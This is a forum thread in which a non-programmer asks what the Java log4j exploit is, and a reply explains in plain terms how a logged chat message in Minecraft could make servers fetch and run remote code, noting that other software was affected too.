3
Can anyone explain to me, in simple terms, what is going on with the Java exploit?
Since I am not a programmer, I don't understand the language. Can anyone please explain in simple terms what is going on?
Create an account or sign in to comment.
4
[deleted]
As Coffee stated, it allows hackers to remotely execute code (e.g. get your IP addresses and download stuff) by sending a string with a certain pattern into chat which gets logged internally (which is what minecraft always does with chat and commands), but also remotely executes that malcious code to grab your details/install ransomware.
Procedure of the hack:
Btw, this affects all applications who use that logging software, not just minecraft. A whole bunch of enterprise programs were vulnerable to this too, such as Steam and the Apple iCloud.
https://www.lunasec.io/docs/blog/log4j-zero-day/
Procedure of the hack:
- Data from the hacker gets sent to the server via chat message to the server
- The server logs the message sent by the hacker, containing the malicious payload
- The (log4j) vulnerability is triggered by this payload and the server makes a request to the main server/Java files of the server via the internally imported software responsible for receiving and displaying chat messages and commands
- The text pattern contains a path to a remote server/java file which is injected and allows an attacker to execute their code remotely.
Btw, this affects all applications who use that logging software, not just minecraft. A whole bunch of enterprise programs were vulnerable to this too, such as Steam and the Apple iCloud.
https://www.lunasec.io/docs/blog/log4j-zero-day/
Basically you can execute whatever pieces of code (malicious or whatever code) just by typing in chat and without permiission of the user!
omg